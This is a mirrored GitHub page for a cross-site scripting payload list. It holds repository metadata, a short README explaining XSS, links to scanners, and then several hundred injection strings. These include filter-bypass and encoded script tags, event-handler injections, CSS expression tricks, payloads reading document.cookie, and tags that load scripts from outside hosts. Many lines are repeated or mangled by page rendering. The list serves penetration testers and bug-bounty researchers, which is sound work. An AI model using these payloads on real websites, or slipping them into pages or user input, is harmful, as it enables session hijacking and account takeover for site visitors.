https://github.com/payloadbox/xss-payload-list
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
https://github.com/payloadbox/xss-payload-list
bugbounty cross-site-scripting dom-based payload payloads reflected-xss-vulnerabilities self-xss websecurity website-vulnerability xss xss-attacks xss-detection xss-exploitation xss-injection xss-payload xss-payloads xss-poc xss-scanner xss-scanners xss-vulnerability
Last synced: 4 months ago
JSON representation
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
- Host: GitHub
- URL: https://github.com/payloadbox/xss-payload-list
- Owner: payloadbox
- License: mit
- Created: 2018-04-23T06:09:29.000Z (about 7 years ago)
- Default Branch: master
- Last Pushed: 2024-07-18T07:11:54.000Z (12 months ago)
- Last Synced: 2025-01-29T17:44:40.315Z (5 months ago)
- Topics: bugbounty, cross-site-scripting, dom-based, payload, payloads, reflected-xss-vulnerabilities, self-xss, websecurity, website-vulnerability, xss, xss-attacks, xss-detection, xss-exploitation, xss-injection, xss-payload, xss-payloads, xss-poc, xss-scanner, xss-scanners, xss-vulnerability
- Homepage: https://ismailtasdelen.medium.com
- Size: 264 KB
- Stars: 6,631
- Watchers: 140
- Forks: 1,724
- Open Issues: 6
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
- License: LICENSE
Awesome Lists containing this project
- StarryDivineSky - payloadbox/xss-payload-list - payload-list 是一个专门收集跨站脚本 (XSS) 漏洞 Payload 的项目。它旨在为安全研究人员、渗透测试人员和开发人员提供一个全面的 XSS Payload 集合,用于测试和验证 Web 应用程序的安全性。该项目包含了各种类型的 XSS Payload,例如:用于绕过不同过滤器的 Payload、针对特定浏览器的 Payload 以及利用特定 XSS 漏洞的 Payload。Payload 按照不同的类别进行组织,方便用户查找和使用。该项目通过不断更新和添加新的 Payload,力求保持其内容的最新性和有效性。它提供了一个便捷的方式来了解和利用各种 XSS 攻击技术,从而帮助提高 Web 应用程序的安全性。该项目也欢迎社区贡献,鼓励安全研究人员分享他们发现的新的 XSS Payload。总而言之,这是一个非常有价值的 XSS Payload 资源库,可以帮助识别和修复 Web 应用程序中的 XSS 漏洞。 (漏洞库_漏洞靶场 / 资源传输下载)
- awesome-rainmana - payloadbox/xss-payload-list - 🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List (Others)
- awesome-hacking-lists - payloadbox/xss-payload-list - 🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List (Others)
README
### 🚀 Cross Site Scripting ( XSS ) Vulnerability Payload List 🚀
##### Overview :
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws, see: [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).
#### XSS Vulnerability Scanner Tool's :
* [XSStrike](https://github.com/UltimateHackers/XSStrike)
* [BruteXSS Terminal](https://github.com/shawarkhanethicalhacker/BruteXSS)
* [BruteXSS GUI](https://github.com/rajeshmajumdar/BruteXSS)
* [XSS Scanner Online](http://xss-scanner.com/)
* [XSSer](https://tools.kali.org/web-applications/xsser)
* [xsscrapy](https://github.com/DanMcInerney/xsscrapy)
* [Cyclops](https://github.com/v8blink/Chromium-based-XSS-Taint-Tracking)
#### XSS Payload List :
```
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)>"@x.y
![]()
![]()
t>
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
'`"><\x3Cscript>javascript:alert(1)
'`"><\x00script>javascript:alert(1)
\x3Cscript>javascript:alert(1)
'"`>/* *\x2Fjavascript:alert(1)// */
javascript:alert(1)javascript:alert(1)javascript:alert(1)javascript:alert(1)
--> ![]()
-->
-->
-->
-->
`"'>>%0A<a%20href=%22javascript\x3Ajavascript:alert(1)%22%20id=%22fuzzelement1%22>test</a>%0A%22)
a='hello\x27;javascript:alert(1)//';
test
test
test
test
test
test
test
test
test
test
test
test
test
test
/* *\x2A/javascript:alert(1)// */
/* *\x00/javascript:alert(1)// */
"'`>ABC
DEF
"'`>ABCDEF
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}
if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}
if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}
'`"><\x3Cscript>javascript:alert(1)
'`"><\x00script>javascript:alert(1)
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
ABC
DEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
"`'>\x3Bjavascript:alert(1)
"`'>\x0Djavascript:alert(1)
"`'>\xEF\xBB\xBFjavascript:alert(1)
"`'>\xE2\x80\x81javascript:alert(1)
"`'>\xE2\x80\x84javascript:alert(1)
"`'>\xE3\x80\x80javascript:alert(1)
"`'>\x09javascript:alert(1)
"`'>\xE2\x80\x89javascript:alert(1)
"`'>\xE2\x80\x85javascript:alert(1)
"`'>\xE2\x80\x88javascript:alert(1)
"`'>\x00javascript:alert(1)
"`'>\xE2\x80\xA8javascript:alert(1)
"`'>\xE2\x80\x8Ajavascript:alert(1)
"`'>\xE1\x9A\x80javascript:alert(1)
"`'>\x0Cjavascript:alert(1)
"`'>\x2Bjavascript:alert(1)
"`'>\xF0\x90\x96\x9Ajavascript:alert(1)
"`'>-javascript:alert(1)
"`'>\x0Ajavascript:alert(1)
"`'>\xE2\x80\xAFjavascript:alert(1)
"`'>\x7Ejavascript:alert(1)
"`'>\xE2\x80\x87javascript:alert(1)
"`'>\xE2\x81\x9Fjavascript:alert(1)
"`'>\xE2\x80\xA9javascript:alert(1)
"`'>\xC2\x85javascript:alert(1)
"`'>\xEF\xBF\xAEjavascript:alert(1)
"`'>\xE2\x80\x83javascript:alert(1)
"`'>\xE2\x80\x8Bjavascript:alert(1)
"`'>\xEF\xBF\xBEjavascript:alert(1)
"`'>\xE2\x80\x80javascript:alert(1)
"`'>\x21javascript:alert(1)
"`'>\xE2\x80\x82javascript:alert(1)
"`'>\xE2\x80\x86javascript:alert(1)
"`'>\xE1\xA0\x8Ejavascript:alert(1)
"`'>\x0Bjavascript:alert(1)
"`'>\x20javascript:alert(1)
"`'>\xC2\xA0javascript:alert(1)
"/>![]()
"/>![]()
"/>![]()
"/>![]()
"/>![]()
"/>![]()
"/>![]()
"/>![]()
"/>![]()
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
`"'>![]()
javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)
alert(1)0
document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;
![]()
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)">
javascript:alert(1)">
foo=">javascript:alert(1)">
foo=">">
<% foo>
d.innerHTML=d.innerHTML
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
%22)
%22)
%22)
%22)
%22)
![]()
XXX
</script>)
![javascript:alert(1)//"]()
X
p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};
@import "data:,*%7bx:expression(javascript:alert(1))%7D";
XXXXXX
*[{}@import'%(css)s?]X
XXX
XXX
/ style=x:expression\28javascript:alert(1)\29>
*{x:expression(javascript:alert(1))}
X
X with(document.getElementById("d"))innerHTML=innerHTML
X
X
XXX #x{font-family:foo[bar;color:green;} #y];color:red;{}
XXX
({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval
({0:#0=eval/#0#/#0#(javascript:alert(1))})
ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">
<script>%(payload)s
javascript:alert(1)
![]()
![]()
![]()
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s">
<%(payload)s//<
![]()
![]()
![]()
@import'%(css)s';
li {list-style-image: url("javascript:javascript:alert(1)");}
- XSS
![]()
javascript:alert(1);
.XSS{background-image:url("javascript:javascript:alert(1)");}
BODY{background:url("javascript:javascript:alert(1)")}
XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)">
+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
X
@import'%(css)s';
a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}
&&javascript:alert(1)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);>
javascript:alert(1);
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
>">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
![]()
![]()
![]()
![]()
![]()
xxs link
xxs link
![]()
alert("XSS")">
![]()
%22)
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
perl -e 'print ")
";' > out
![]()
<alert("XSS");//<
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");
![]()
![]()
li {list-style-image: url("javascript:alert('XSS')");}
- XSS
![]()
![]()
@import'http://ha.ckers.org/xss.css';
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';
![]()
exp/*
alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
BODY{background:url("javascript:alert('XSS')")}
¼script¾alert(¢XSS¢)¼/script¾
echo('alert("XSS")'); ?>
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
" SRC="http://ha.ckers.org/xss.js">
'" SRC="http://ha.ckers.org/xss.js">
` SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
XSS
XSS
XSS
XSS
XSS
XSS
{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
X
alert(0%0)
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/
|\>''alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);
X
http://www.alert(1)
alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
+-+-1-+-+alert(1)
/*<script* */alert(1)//
confirm(1);
alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) style="x:">
<--`![]()
--!>
x
">
CLICKME
click
Click Me
‘; alert(1);
‘)alert(1);//
alert(1)
![]()
;%E2%80%9D)
![]()
![]()
{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
X
alert(0%0)
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/
|\>''alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);
X
http://www.alert(1)
alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
+-+-1-+-+alert(1)
/*<script* */alert(1)//
confirm(1);
alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) style="x:">
<--`![]()
--!>
x
">
CLICKME
click
Click Me
String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))
![]()
alert(“XSS”)”>
![]()
;%E2%80%9D)
<alert(“XSS”);//<
%253cscript%253ealert(1)%253c/script%253e
“>alert(document.cookie)
fooalert(1)
ipt>alert(1)ipt>
![]()
![]()
![]()
%E2%80%9D)
![]()
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
'" SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
<alert("XSS");//<
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
alert("XSS");&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search
hellox worldss
...
lol
//)
<img src="
foo=">alert(1)">
alert(1)">
foo=">alert(1)">
foo=">">
<% foo>
LOL
LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
({0:#0=alert/#0#/#0#(0)})
LOLalert(123)
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
žscriptualert(EXSSE)ž/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
